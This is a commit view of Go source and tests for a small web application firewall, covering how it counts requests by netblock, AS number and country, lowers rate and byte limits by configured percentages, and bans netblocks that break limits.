for range 5 {
s.uploadFrom(client)
}
want := []anomaly.Counter{{
Scope: anomaly.ScopeNet,
Netblock: netip.MustParsePrefix(clientsNet),
Minute: ratelimit.Buckets{Start: clk.Now(), Current: 5},
}}
if got := server.Anomalies.Snapshot(); !reflect.DeepEqual(got, want) {
t.Errorf("counters\n%+v\nwant\n%+v", got, want)
}
wantAlerts(t, queue)
}
func TestNetblockAroundAClientIsAsLongAsTheSettingsSay(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
name string
env map[string]string
// Each client of sent sends one request, and want gives the
// netblocks they are counted in, each with its requests.
sent []string
want map[string]int64
}{
{
"by default", nil,
[]string{client, "203.0.113.200", "192.0.2.7", ipv6Client, "2001:db8:0:ffff::1"},
map[string]int64{clientsNet: 2, "192.0.2.0/24": 1, "2001:db8::/48": 2},
},
{
"as set", map[string]string{anomalyNetV4Prefix: "16", anomalyNetV6Prefix: "32"},
[]string{client, "203.0.200.1", ipv6Client, "2001:db8:ffff::1"},
map[string]int64{"203.0.0.0/16": 2, "2001:db8::/32": 2},
},
} {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
env := map[string]string{anomalyNet + requestsPerMinute: aLot}
maps.Copy(env, tc.env)
s, _, server, _ := startAppWithAlerts(t, readAndAnswer, env)
for _, from := range tc.sent {
s.get(from, http.StatusOK, requestlog.ActionForward)
}
got := map[string]int64{}
for _, counter := range server.Anomalies.Snapshot() {
got[counter.Netblock.String()] = counter.Minute.Current
}
if !maps.Equal(got, tc.want) {
t.Errorf("requests by netblock %v, want %v", got, tc.want)
}
})
}
}
func TestClientIsCountedForItsASNumberOnceTheLookupGivesOne(t *testing.T) {
t.Parallel()
s, server, _ := startWithLookups(t, map[string]string{
anomalyASN + requestsPerMinute: aLot,
})
// The lookup database does not hold unplaced.
for _, from := range []string{fromDE, fromDE, fromKP, noCountry, unplaced} {
s.uploadFrom(from)
}
got := map[string]int64{}
for _, counter := range server.Anomalies.Snapshot() {
got[counter.ASN] = counter.Minute.Current
}
if want := map[string]int64{asnDE: 2, asnKP: 1, "AS64500": 1}; !maps.Equal(got, want) {
t.Errorf("requests by AS number %v, want %v", got, want)
}
}
func TestRequestCountsForTheASNumberGeoJSGivesBeforeItEnds(t *testing.T) {
t.Parallel()
// The stand-in for GeoJS answers only once released, which the app
// does as it answers the request, and then waits until the answer is
// kept.
geojsURL, _, release := startHeldGeoJS(t)
var server atomic.Pointer[proxy.Server]
app := startApp(t, func(http.ResponseWriter, *http.Request) {
release()
waitUntil(func() bool {
_, kept := server.Load().GeoJS.Kept(netip.MustParsePrefix(fromDE + "/32"))
return kept
})
})
clk := &clock{now: time.Date(2026, 10, 6, 0, 0, 0, 0, time.UTC)}
addr, out, started := startProxyWithClock(t, app.URL, geojsURL, clk.Now,
map[string]string{
trustedProxies: trustLocalhost,
lookupTimeout: "1h",
anomalyASN + requestsPerMinute: aLot,
})
server.Store(started)
// The request went on without the answer, and is counted for the AS
// number it gives.
s := &sender{t: t, addr: addr, out: out}
if line := s.get(fromDE, http.StatusOK, requestlog.ActionForward); line.ASN != "" {
t.Errorf("log line has AS number %q, want none: the request waited", line.ASN)
}
want := []anomaly.Counter{{
Scope: anomaly.ScopeASN, ASN: asnDE,
Minute: ratelimit.Buckets{Start: clk.Now(), Current: 1},
}}
if got := started.Anomalies.Snapshot(); !reflect.DeepEqual(got, want) {
t.Errorf("counters\n%+v\nwant\n%+v", got, want)
}
}
func TestEachNamedNetblockCountsTheClientsInIt(t *testing.T) {
t.Parallel()
s, _, server, _ := startAppWithAlerts(t, readAndAnswer, map[string]string{
anomalyWatch + requestsPerMinute: aLot,
watchNets: office + ",wide=203.0.0.0/16,other=198.51.100.0/25",
})
// client is in office and in wide.
for _, from := range []string{client, "203.0.200.1", "192.0.2.7"} {
s.get(from, http.StatusOK, requestlog.ActionForward)
}
got := map[string]int64{}
for _, counter := range server.Anomalies.Snapshot() {
got[counter.Name] = counter.Minute.Current
}
if want := map[string]int64{"office": 1, "wide": 2}; !maps.Equal(got, want) {
t.Errorf("requests by named netblock %v, want %v", got, want)
}
}
+192 -36
View File
@@ -1,13 +1,15 @@
package proxy package proxy
import ( import (
"net/http"
"net/netip" "net/netip"
"time" "time"
"sneak.berlin/go/smallwebwaf/internal/alerts" "sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/bans" "sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/ratelimit"
"sneak.berlin/go/smallwebwaf/internal/reputation"
"sneak.berlin/go/smallwebwaf/internal/requestlog" "sneak.berlin/go/smallwebwaf/internal/requestlog"
"sneak.berlin/go/smallwebwaf/internal/rules"
) )
// banResponse is a refusal answered with SWWAF_BAN_RESPONSE, and logged // banResponse is a refusal answered with SWWAF_BAN_RESPONSE, and logged
@@ -41,78 +43,194 @@ func (rq *request) banned(now time.Time) bool {
// limitBroken counts the request for the rate limits at now, notes the // limitBroken counts the request for the rate limits at now, notes the
// client's counts for the log line, and reports whether the request takes // client's counts for the log line, and reports whether the request takes
// the client over a limit. In enforce mode such a request bans the // the client over a rate limit, as its limit percentage lowers it, which
// client's netblock, and sets the client's counters back to zero; in // breaks it.
// observe mode it does neither, and raises the alert for the ban it would
// have made, if that alert would be sent.
func (rq *request) limitBroken(now time.Time) bool { func (rq *request) limitBroken(now time.Time) bool {
group := clientGroup(rq.client) counts, hit, over := rq.h.limiter.Count(rq.h.clientGroup(rq.client), now,
rq.limitPercent.percent)
counts, hit, over := rq.h.limiter.Count(group, now)
rq.line.Counts = counts rq.line.Counts = counts
if !over { if over {
return false rq.banForLimit(now, hit, rq.h.config.BanResponse)
} }
return over
}
// countBytes counts the request's bytes, as countedBytes gives them, for
// the byte limits, once its response has ended, and notes the client's
// byte totals for the log line; its requests stay there as the rate limits
// counted them. Only a request passed to the app has them counted, and
// only one the rate limits counted; in observe mode, not one that enforce
// mode would have refused. Bytes that take the client over a byte limit,
// as its limit percentage for the byte limits lowers it, break it; the
// response was passed on whole.
func (rq *request) countBytes() {
if !rq.counted || rq.line.WouldAction != "" {
return
}
now := rq.h.now()
counts, hit, over := rq.h.limiter.CountBytes(rq.h.clientGroup(rq.client), now,
rq.countedBytes(), rq.bytesPercent.percent)
rq.line.Counts.MinuteBytes = counts.MinuteBytes
rq.line.Counts.HourBytes = counts.HourBytes
rq.line.Counts.DayBytes = counts.DayBytes
if over {
rq.banForLimit(now, hit, rq.out.status)
}
}
// countRefusal counts the request for the error burst once it has been
// answered, if smallwebwaf refused it after a rule file match, a trap path
// or a Core Rule Set match, or for a missing or wrong token, and in
// observe mode if enforce mode would have: more than
// SWWAF_ERROR_BURST_THRESHOLD such refusals of the client within a minute
// break a limit. A client in SWWAF_ALLOW_NETS, which the checks skip, is
// not counted, and nothing is while the threshold is off.
func (rq *request) countRefusal() {
cfg := rq.h.config
if cfg.ErrorBurstThreshold == 0 {
return
}
// In observe mode, a request that enforce mode would have refused
// before it reached the endpoint has had no token refused there.
tokenRefused := rq.tokenRefused && rq.line.WouldAction == "" &&
!isInside(rq.client, cfg.AllowNets)
if !rq.attack && !rq.ruleBlocked && !rq.wafBlocked && !tokenRefused {
return
}
now := rq.h.now()
hit, over := rq.h.limiter.CountRefusal(rq.h.clientGroup(rq.client), now,
cfg.ErrorBurstThreshold)
if !over {
return
}
// What the client was sent, or in observe mode would have been.
status := rq.out.status
switch rq.line.WouldAction {
case requestlog.ActionRuleBlocked, requestlog.ActionWAFBlocked:
status = http.StatusForbidden
case requestlog.ActionBanned:
status = cfg.BanResponse
}
rq.banForLimit(now, hit, status)
}
// countedBytes returns the request's bytes, once it has ended, as the
// byte limits and the anomaly thresholds count them: the response's body
// bytes, the request's, or both, as SWWAF_BYTES_COUNT says. For an
// upgraded connection, such as a WebSocket, which has closed by then, what
// it carried from the app counts with the response's and what it carried
// from the client with the request's.
func (rq *request) countedBytes() int64 {
response, request := rq.out.bytes, rq.requestBytes()
if rq.upgraded != nil {
response += rq.upgraded.fromApp.Load()
request += rq.upgraded.toApp.Load()
}
switch rq.h.config.BytesCount {
case "response":
return response
case "request":
return request
default: // both
return response + request
}
}
// banForLimit bans the client's netblock at now for a broken limit, the
// one hit names, notes the offence for the log line and counts the hit in
// the metrics. status is what the client was sent, or is sent:
// SWWAF_BAN_RESPONSE for a request over a rate limit, the app's answer for
// one whose bytes broke a byte limit, the refusal for one that broke the
// error burst. The ban's notes give the client's limit percentage for a
// rate limit or a byte limit; the error burst is not lowered. The ban sets
// the client's counters back to zero. In observe mode it makes no ban and
// sets nothing back, and raises the alert for the ban it would have made,
// if that alert would be sent.
func (rq *request) banForLimit(now time.Time, hit ratelimit.Hit, status int) {
switch hit.Kind {
case ratelimit.KindBytes:
rq.line.LimitHit = hit.Window + "_bytes" // as counts names the byte totals
case ratelimit.KindRefusals:
rq.line.LimitHit = requestlog.LimitHitErrorBurst
default:
rq.line.LimitHit = hit.Window rq.line.LimitHit = hit.Window
}
rq.line.Offence = requestlog.OffenceLimit rq.line.Offence = requestlog.OffenceLimit
rq.h.metrics.LimitHit(hit)
netblock := rq.h.netblock(rq.client) netblock := rq.h.netblock(rq.client)
if rq.h.config.Observe && !rq.wouldAlertBan(netblock, now, bans.CauseLimit) { if rq.h.config.Observe && !rq.wouldAlertBan(netblock, now, bans.CauseLimit) {
return true return
} }
notes := bans.Notes{ notes := bans.Notes{
ASN: rq.line.ASN, ASN: rq.line.ASN,
ASName: rq.line.ASName, ASName: rq.line.ASName,
Country: rq.line.Country, Country: rq.line.Country,
Kind: hit.Kind,
Limit: hit.Limit, Limit: hit.Limit,
Window: hit.Window, Window: hit.Window,
Count: hit.Requests, Count: hit.Count,
Request: rq.noted(now), Reputation: rq.reputation,
Request: rq.noted(now, status),
Requests: rq.netblockRequests(netblock), Requests: rq.netblockRequests(netblock),
} }
switch hit.Kind {
case ratelimit.KindRequests:
notes.LimitPercent, notes.LimitPercentSetting = rq.limitPercent.logged()
case ratelimit.KindBytes:
notes.LimitPercent, notes.LimitPercentSetting = rq.bytesPercent.logged()
}
if rq.h.config.Observe { if rq.h.config.Observe {
ban, wouldBan := rq.h.ledger.WouldBanForLimit(netblock, now, notes) ban, wouldBan := rq.h.ledger.WouldBanForLimit(netblock, now, notes)
if wouldBan { if wouldBan {
rq.alertBan(ban) rq.alertBan(ban)
} }
return true return
} }
ban, made := rq.h.ledger.BanForLimit(netblock, now, notes) ban, made := rq.h.ledger.BanForLimit(netblock, now, notes)
rq.h.limiter.Reset(group) rq.h.limiter.Reset(rq.h.clientGroup(rq.client))
rq.line.BanExpires = banExpires(ban) rq.line.BanExpires = banExpires(ban)
if made { if made {
rq.alertBan(ban) rq.alertBan(ban)
} }
return true
} }
// banForAttack bans the client's netblock at now for a clear sign of // banForAttack bans the client's netblock at now for a clear sign of
// attack, the match of rule, a ban rule. In observe mode it makes no ban, // attack, which notes name: the ban rule that matched, or the trap path
// and raises the alert for the ban it would have made, if that alert // asked for. It fills in the rest of the notes. In observe mode it makes
// would be sent. // no ban, and raises the alert for the ban it would have made, if that
func (rq *request) banForAttack(now time.Time, rule rules.Rule) { // alert would be sent.
func (rq *request) banForAttack(now time.Time, notes bans.Notes) {
netblock := rq.h.netblock(rq.client) netblock := rq.h.netblock(rq.client)
if rq.h.config.Observe && !rq.wouldAlertBan(netblock, now, bans.CauseAttack) { if rq.h.config.Observe && !rq.wouldAlertBan(netblock, now, bans.CauseAttack) {
return return
} }
notes := bans.Notes{ notes.ASN = rq.line.ASN
ASN: rq.line.ASN, notes.ASName = rq.line.ASName
ASName: rq.line.ASName, notes.Country = rq.line.Country
Country: rq.line.Country, notes.Reputation = rq.reputation
RuleID: rule.ID, notes.Request = rq.noted(now, rq.h.config.BanResponse)
Target: rule.Target, notes.Requests = rq.netblockRequests(netblock)
Request: rq.noted(now),
Requests: rq.netblockRequests(netblock),
}
if rq.h.config.Observe { if rq.h.config.Observe {
ban, wouldBan := rq.h.ledger.WouldBanForAttack(netblock, now, notes) ban, wouldBan := rq.h.ledger.WouldBanForAttack(netblock, now, notes)
@@ -131,6 +249,44 @@ func (rq *request) banForAttack(now time.Time, rule rules.Rule) {
} }
} }
// banForCrowdSec bans the client's netblock at now until decision,
// CrowdSec's decision on the client, ends. In observe mode it makes no
// ban, and raises the alert for the ban it would have made, if that alert
// would be sent.
func (rq *request) banForCrowdSec(now time.Time, decision reputation.Decision) {
netblock := rq.h.netblock(rq.client)
if rq.h.config.Observe && !rq.wouldAlertBan(netblock, now, bans.CauseCrowdSec) {
return
}
notes := bans.Notes{
ASN: rq.line.ASN,
ASName: rq.line.ASName,
Country: rq.line.Country,
Reputation: rq.reputation,
Request: rq.noted(now, rq.h.config.BanResponse),
Requests: rq.netblockRequests(netblock),
}
if rq.h.config.Observe {
ban, wouldBan := rq.h.ledger.WouldBanForCrowdSec(netblock, now, decision.Expires,
decision.Scenario, notes)
if wouldBan {
rq.alertBan(ban)
}
return
}
ban, made := rq.h.ledger.BanForCrowdSec(netblock, now, decision.Expires,
decision.Scenario, notes)
rq.line.BanExpires = banExpires(ban)
if made {
rq.alertBan(ban)
}
}
// wouldAlertBan reports whether the alert for a ban on netblock for cause // wouldAlertBan reports whether the alert for a ban on netblock for cause
// made at now would be sent. In observe mode the ban the request would // made at now would be sent. In observe mode the ban the request would
// have made is worked out only then, at most once per // have made is worked out only then, at most once per
@@ -177,16 +333,16 @@ func (rq *request) alertBan(ban bans.Ban) {
}) })
} }
// noted is the request, refused at now with SWWAF_BAN_RESPONSE, or in // noted is the request, at now, with status, what the client was sent, or
// observe mode as it would have been, as the notes of the ban it makes // in observe mode would have been, as the notes of the ban it makes keep
// keep it. // it.
func (rq *request) noted(now time.Time) bans.Request { func (rq *request) noted(now time.Time, status int) bans.Request {
return bans.Request{ return bans.Request{
Time: now, Time: now,
Method: rq.in.Method, Method: rq.in.Method,
Host: rq.in.Host, Host: rq.in.Host,
Path: rq.in.URL.RequestURI(), Path: rq.in.URL.RequestURI(),
Status: rq.h.config.BanResponse, Status: status,
UserAgent: rq.in.UserAgent(), UserAgent: rq.in.UserAgent(),
} }
} }
@@ -207,7 +363,7 @@ func (h *handler) netblock(client netip.Addr) netip.Prefix {
return netip.PrefixFrom(addr, h.config.BanScopeV4Prefix).Masked() return netip.PrefixFrom(addr, h.config.BanScopeV4Prefix).Masked()
} }
return clientGroup(addr) return h.clientGroup(addr)
} }
// banExpires is when ban ends, as the log line gives it: a time, or // banExpires is when ban ends, as the log line gives it: a time, or
+12 -2
View File
@@ -7,6 +7,7 @@ import (
"maps" "maps"
"net/http" "net/http"
"net/netip" "net/netip"
"reflect"
"slices" "slices"
"sync" "sync"
"testing" "testing"
@@ -165,9 +166,14 @@ func TestBanCoversTheClientsNetblock(t *testing.T) {
[]string{otherClient, exempt}, []string{"203.0.112.9", allowed}, []string{otherClient, exempt}, []string{"203.0.112.9", allowed},
}, },
{ {
"an IPv6 /64", nil, "2001:db8:5::1", "an IPv6 /64, by default", nil, "2001:db8:5::1",
[]string{"2001:db8:5::ffff:1"}, []string{"2001:db8:5:1::1"}, []string{"2001:db8:5::ffff:1"}, []string{"2001:db8:5:1::1"},
}, },
{
"the IPv6 netblock SWWAF_IPV6_GROUP_PREFIX sets",
map[string]string{ipv6GroupPrefix: "48"}, "2001:db8:7::1",
[]string{"2001:db8:7:ffff::1"}, []string{"2001:db8:8::1"},
},
} { } {
t.Run(tc.name, func(t *testing.T) { t.Run(tc.name, func(t *testing.T) {
t.Parallel() t.Parallel()
@@ -199,6 +205,7 @@ func TestBannedClientIsRefusedBeforeItsCountryIsLookedUp(t *testing.T) {
geojsURL, asked := startGeoJS(t) geojsURL, asked := startGeoJS(t)
s, _, _ := startWithClock(t, geojsURL, map[string]string{ s, _, _ := startWithClock(t, geojsURL, map[string]string{
lookupTimeout: "1h",
rateLimitPerMinute: "1", rateLimitPerMinute: "1",
banScopeV4Prefix: "24", banScopeV4Prefix: "24",
deniedCountries: "kp", deniedCountries: "kp",
@@ -237,6 +244,7 @@ func TestBanResponseAnswersEveryRefusalButTheSizeLimits(t *testing.T) {
geojsURL, _ := startGeoJS(t) geojsURL, _ := startGeoJS(t)
env := map[string]string{ env := map[string]string{
lookupTimeout: "1h",
rateLimitPerMinute: "1", rateLimitPerMinute: "1",
denyNets: denied, denyNets: denied,
deniedCountries: "kp", deniedCountries: "kp",
@@ -262,6 +270,7 @@ func TestBanNotes(t *testing.T) {
geojsURL, _ := startGeoJS(t) geojsURL, _ := startGeoJS(t)
s, clk, server := startWithClock(t, geojsURL, map[string]string{ s, clk, server := startWithClock(t, geojsURL, map[string]string{
lookupTimeout: "1h",
rateLimitPerMinute: "1", rateLimitPerMinute: "1",
deniedCountries: "kp", deniedCountries: "kp",
}) })
@@ -284,6 +293,7 @@ func TestBanNotes(t *testing.T) {
ASN: asnDE, ASN: asnDE,
ASName: asNameDE, ASName: asNameDE,
Country: "DE", Country: "DE",
Kind: "requests",
Limit: 1, Limit: 1,
Window: minute, Window: minute,
Count: 2, Count: 2,
@@ -306,7 +316,7 @@ func TestBanNotes(t *testing.T) {
ledger := server.Ledger ledger := server.Ledger
got := ledger.Bans(netblock) got := ledger.Bans(netblock)
if len(got) != 1 || got[0] != want { if len(got) != 1 || !reflect.DeepEqual(got[0], want) {
t.Fatalf("bans\n%+v\nwant\n%+v", got, want) t.Fatalf("bans\n%+v\nwant\n%+v", got, want)
} }
+119
View File
@@ -0,0 +1,119 @@
package proxy
import (
"sneak.berlin/go/smallwebwaf/internal/config"
)
// whole is the percentage of each limit a client gets when no biased
// threshold lowers its limits.
const whole = 100
// percentage is a client's limit percentage for the rate limits or for
// the byte limits, as the biased thresholds give it, and the setting that
// gave it: "" with whole when none lowers that kind of limit.
type percentage struct {
percent int64
setting string
}
// biasedThresholdsSet reports whether a biased threshold can lower a
// client's limits: one of its lists is not empty,
// SWWAF_UNKNOWN_LIMIT_PERCENT is below 100, or SWWAF_ASN_LIMIT_PERCENT_URL
// is set. The client's lookup is then needed before its request goes on.
func biasedThresholdsSet(cfg *config.Config) bool {
return len(cfg.ASNLimitPercent) > 0 || len(cfg.CountryLimitPercent) > 0 ||
len(cfg.ASNBytesPercent) > 0 || len(cfg.CountryBytesPercent) > 0 ||
cfg.UnknownLimitPercent < whole || cfg.ASNLimitPercentURL != ""
}
// limitPercentages returns the client's limit percentages, for the rate
// limits and for the byte limits, by its AS number and country as looked
// up, each "" when unknown, and the blocklists, DNSBL zones and AbuseIPDB
// that list it. Each is the lowest of those the settings give it, the
// first of them in the order below when several are lowest: the
// percentage SWWAF_ASN_LIMIT_PERCENT gives its AS number, the one the file
// SWWAF_ASN_LIMIT_PERCENT_URL names gives it, the one
// SWWAF_COUNTRY_LIMIT_PERCENT gives its country, for a client without a
// country, SWWAF_UNKNOWN_LIMIT_PERCENT, for a client a blocklist lists,
// the percentage of SWWAF_BLOCKLIST_ACTION while it is limit, and for a
// client a DNSBL zone's verdict lists, or whose AbuseIPDB score is a hit,
// the percentage of SWWAF_REPUTATION_ACTION while it is limit. For the
// byte limits, SWWAF_ASN_BYTES_PERCENT and SWWAF_COUNTRY_BYTES_PERCENT
// take the place of the first three for an AS number or a country they
// list.
func (rq *request) limitPercentages() (percentage, percentage) {
cfg := rq.h.config
asn, country := rq.line.ASN, rq.line.Country
unknown := percentage{percent: whole}
if country == "" {
unknown = percentage{cfg.UnknownLimitPercent, "SWWAF_UNKNOWN_LIMIT_PERCENT"}
}
fetched := percentage{percent: whole}
if percent, listed := rq.h.lists.ASNLimitPercent(asn); listed {
fetched = percentage{percent, "SWWAF_ASN_LIMIT_PERCENT_URL"}
}
blocklisted := percentage{percent: whole}
if rq.blocklisted && cfg.BlocklistAction == "limit" {
blocklisted = percentage{cfg.BlocklistLimitPercent, "SWWAF_BLOCKLIST_ACTION"}
}
reputationListed := percentage{percent: whole}
if (rq.dnsblListed || rq.abuseIPDBHit) && cfg.ReputationAction == "limit" {
reputationListed = percentage{cfg.ReputationLimitPercent, "SWWAF_REPUTATION_ACTION"}
}
asnRequests := lowest(given(cfg.ASNLimitPercent, asn, "SWWAF_ASN_LIMIT_PERCENT"),
fetched)
countryRequests := given(cfg.CountryLimitPercent, country,
"SWWAF_COUNTRY_LIMIT_PERCENT")
asnBytes, countryBytes := asnRequests, countryRequests
if _, listed := cfg.ASNBytesPercent[asn]; listed {
asnBytes = given(cfg.ASNBytesPercent, asn, "SWWAF_ASN_BYTES_PERCENT")
}
if _, listed := cfg.CountryBytesPercent[country]; listed {
countryBytes = given(cfg.CountryBytesPercent, country, "SWWAF_COUNTRY_BYTES_PERCENT")
}
return lowest(asnRequests, countryRequests, unknown, blocklisted, reputationListed),
lowest(asnBytes, countryBytes, unknown, blocklisted, reputationListed)
}
// given returns the percentage percents, the setting named setting, gives
// code, an AS number or a country, or whole when it does not list code.
func given(percents map[string]int64, code, setting string) percentage {
percent, listed := percents[code]
if !listed {
return percentage{percent: whole}
}
return percentage{percent, setting}
}
// lowest returns the lowest of percentages below whole, the first of them
// when several are lowest, or whole when none is below it.
func lowest(percentages ...percentage) percentage {
low := percentage{percent: whole}
for _, p := range percentages {
if p.percent < low.percent {
low = p
}
}
return low
}
// logged returns p as the log line and the notes of a ban give it: its
// percent and setting, or nil and "" for whole, which they leave out.
func (p percentage) logged() (*int64, string) {
if p.percent == whole {
return nil, ""
}
return &p.percent, p.setting
}
+504
View File
@@ -0,0 +1,504 @@
package proxy_test
import (
"fmt"
"io"
"maps"
"net"
"net/http"
"net/http/httptest"
"net/netip"
"path/filepath"
"strings"
"testing"
"testing/synctest"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/lookup/lookuptest"
"sneak.berlin/go/smallwebwaf/internal/proxy"
"sneak.berlin/go/smallwebwaf/internal/requestlog"
)
// The biased thresholds.
const (
asnLimitPercent = "SWWAF_ASN_LIMIT_PERCENT"
countryLimitPercent = "SWWAF_COUNTRY_LIMIT_PERCENT"
asnBytesPercent = "SWWAF_ASN_BYTES_PERCENT"
countryBytesPercent = "SWWAF_COUNTRY_BYTES_PERCENT"
unknownLimitPercent = "SWWAF_UNKNOWN_LIMIT_PERCENT"
)
const (
// asnDEHalf and countryDEHalf give fromDE's AS number and its country
// half of every limit, and asnDEQuarter gives its AS number a quarter.
asnDEHalf = asnDE + ":50"
asnDEQuarter = asnDE + ":25"
countryDEHalf = "de:50"
// noCountry is in an AS of its own, AS64500, and in no country.
noCountry = "192.0.2.80"
// fourAMinute is the rate limit these tests set: half of it is 2
// requests a minute, a quarter of it 1.
fourAMinute = "4"
// twoUploads is the byte limit these tests set: 199 bytes, which an
// upload, a request with a body and its answer, 100 bytes, is within,
// and half of which, 99 bytes, it is over.
twoUploads = "199"
// none is how percentText gives a percentage left out.
none = "none"
)
func TestEachBiasedThresholdLowersTheRateLimits(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
setting, value, from string
}{
{asnLimitPercent, asnDEHalf, fromDE},
{countryLimitPercent, countryDEHalf, fromDE},
{unknownLimitPercent, "50", unplaced},
} {
t.Run(tc.setting, func(t *testing.T) {
t.Parallel()
s, _, _ := startWithLookups(t, map[string]string{
rateLimitPerMinute: fourAMinute, tc.setting: tc.value,
})
// Half of 4 requests a minute: the third breaks the limit.
for _, sent := range []struct {
status int
action string
}{
{http.StatusOK, requestlog.ActionForward},
{http.StatusOK, requestlog.ActionForward},
{http.StatusForbidden, requestlog.ActionRateLimited},
} {
line := s.get(tc.from, sent.status, sent.action)
wantPercent(t, "limit_percent", line.LimitPercent, line.LimitPercentSetting,
"50 from "+tc.setting)
}
// fromKP, which no setting lists, has the whole limit.
for range 3 {
line := s.get(fromKP, http.StatusOK, requestlog.ActionForward)
wantPercent(t, "limit_percent", line.LimitPercent, line.LimitPercentSetting,
none)
}
})
}
}
func TestEachBiasedThresholdLowersTheByteLimits(t *testing.T) {
t.Parallel()
// The AS numbers and countries are given in either case.
for _, tc := range []struct {
setting, value, from string
}{
{asnLimitPercent, asnDEHalf, fromDE},
{countryLimitPercent, "DE:50", fromDE},
{unknownLimitPercent, "50", unplaced},
{asnBytesPercent, "as64496:50", fromDE},
{countryBytesPercent, countryDEHalf, fromDE},
} {
t.Run(tc.setting, func(t *testing.T) {
t.Parallel()
s, _, _ := startWithLookups(t, map[string]string{
bytesLimitPerMinute: twoUploads, tc.setting: tc.value,
})
// The upload's 100 bytes are over half of 199, 99.
line := s.uploadFrom(tc.from)
if line.LimitHit != minuteBytes {
t.Errorf("log line has limit_hit %q, want %s", line.LimitHit, minuteBytes)
}
wantPercent(t, "bytes_percent", line.BytesPercent, line.BytesPercentSetting,
"50 from "+tc.setting)
// fromKP, which no setting lists, has the whole limit.
line = s.uploadFrom(fromKP)
if line.LimitHit != "" {
t.Errorf("log line for %s has limit_hit %q, want none", fromKP, line.LimitHit)
}
wantPercent(t, "bytes_percent", line.BytesPercent, line.BytesPercentSetting, none)
})
}
}
func TestBytesPercentSettingsTakeThePlaceOfTheOthersForByteLimits(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
name string
env map[string]string
// limitPercent and bytesPercent are the log line's, as percentText
// gives them, and limitHit is its limit_hit.
limitPercent, bytesPercent, limitHit string
}{
{
"lowering the byte limits alone",
map[string]string{asnBytesPercent: asnDEHalf},
none, "50 from " + asnBytesPercent, minuteBytes,
},
{
"lowering the byte limits alone, by country",
map[string]string{countryBytesPercent: countryDEHalf},
none, "50 from " + countryBytesPercent, minuteBytes,
},
{
"raising the byte limits back",
map[string]string{asnLimitPercent: asnDEHalf, asnBytesPercent: asnDE + ":100"},
"50 from " + asnLimitPercent, none, "",
},
{
"raising the byte limits back, by country",
map[string]string{countryLimitPercent: countryDEHalf, countryBytesPercent: "de:100"},
"50 from " + countryLimitPercent, none, "",
},
} {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
env := map[string]string{bytesLimitPerMinute: twoUploads}
maps.Copy(env, tc.env)
s, _, _ := startWithLookups(t, env)
// The upload's 100 bytes are over 99, half of 199, and within 199.
line := s.uploadFrom(fromDE)
if line.LimitHit != tc.limitHit {
t.Errorf("log line has limit_hit %q, want %q", line.LimitHit, tc.limitHit)
}
wantPercent(t, "limit_percent", line.LimitPercent, line.LimitPercentSetting,
tc.limitPercent)
wantPercent(t, "bytes_percent", line.BytesPercent, line.BytesPercentSetting,
tc.bytesPercent)
})
}
}
func TestZeroPercentIsAZeroAllowance(t *testing.T) {
t.Parallel()
s, _, _ := startWithLookups(t, map[string]string{asnLimitPercent: asnDE + ":0"})
// The first request breaks the limit, and bans the client; the log line
// gives the 0.
line := s.get(fromDE, http.StatusForbidden, requestlog.ActionRateLimited)
if line.fields["limit_percent"] != float64(0) ||
line.fields["limit_percent_setting"] != asnLimitPercent {
t.Errorf("log line has limit_percent %v from %v, want 0 from %s",
line.fields["limit_percent"], line.fields["limit_percent_setting"],
asnLimitPercent)
}
s.get(fromDE, http.StatusForbidden, requestlog.ActionBanned)
}
func TestLowestPercentageApplies(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
name string
env map[string]string
from string
// want is the log line's limit_percent, as percentText gives it.
want string
}{
{
"the country's",
map[string]string{asnLimitPercent: asnDEHalf, countryLimitPercent: "de:25"},
fromDE, "25 from " + countryLimitPercent,
},
{
"the AS number's",
map[string]string{asnLimitPercent: asnDEQuarter, countryLimitPercent: countryDEHalf},
fromDE, "25 from " + asnLimitPercent,
},
{
"the AS number's, the first of two alike",
map[string]string{asnLimitPercent: asnDEQuarter, countryLimitPercent: "de:25"},
fromDE, "25 from " + asnLimitPercent,
},
{
"that for a client without a country",
map[string]string{asnLimitPercent: "AS64500:50", unknownLimitPercent: "25"},
noCountry, "25 from " + unknownLimitPercent,
},
{
// SWWAF_UNKNOWN_LIMIT_PERCENT is left at its default, 100.
"the AS number's, for a client without a country",
map[string]string{asnLimitPercent: "AS64500:25"},
noCountry, "25 from " + asnLimitPercent,
},
} {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
env := map[string]string{rateLimitPerMinute: fourAMinute}
maps.Copy(env, tc.env)
s, _, _ := startWithLookups(t, env)
// A quarter of 4 requests a minute: the second breaks the limit.
s.get(tc.from, http.StatusOK, requestlog.ActionForward)
line := s.get(tc.from, http.StatusForbidden, requestlog.ActionRateLimited)
wantPercent(t, "limit_percent", line.LimitPercent, line.LimitPercentSetting,
tc.want)
})
}
}
func TestUnknownLimitPercentGivesEveryClientWithoutACountryItsPercentage(t *testing.T) {
t.Parallel()
s, _, _ := startWithLookups(t, map[string]string{
rateLimitPerMinute: fourAMinute, unknownLimitPercent: "50",
})
// One the lookup database does not hold, and one on a private address,
// which is never looked up: the third request of each breaks half of 4.
for _, from := range []string{unplaced, "10.0.0.8"} {
s.get(from, http.StatusOK, requestlog.ActionForward)
s.get(from, http.StatusOK, requestlog.ActionForward)
s.get(from, http.StatusForbidden, requestlog.ActionRateLimited)
}
// One in a country has the whole limit.
for range 3 {
s.get(fromDE, http.StatusOK, requestlog.ActionForward)
}
}
func TestClientWithoutAnAnswerInTimeHasTheUnknownLimitPercent(t *testing.T) {
t.Parallel()
// In a synctest bubble, as TestRequestWaitsAsLongAsTheLookupTimeoutSays
// says, with a GeoJS that never answers.
synctest.Test(t, func(t *testing.T) {
server, out, _ := newProxy(t, "http://app.invalid", unansweredGeoJSURL,
time.Now, map[string]string{unknownLimitPercent: "0"})
// Once the second the request waits for its answer is up, the client
// counts as without a country, and its zero allowance refuses the
// request before it reaches the app.
serveFromDE(t, server, http.MethodGet, http.NoBody)
line := out.requestLine(t)
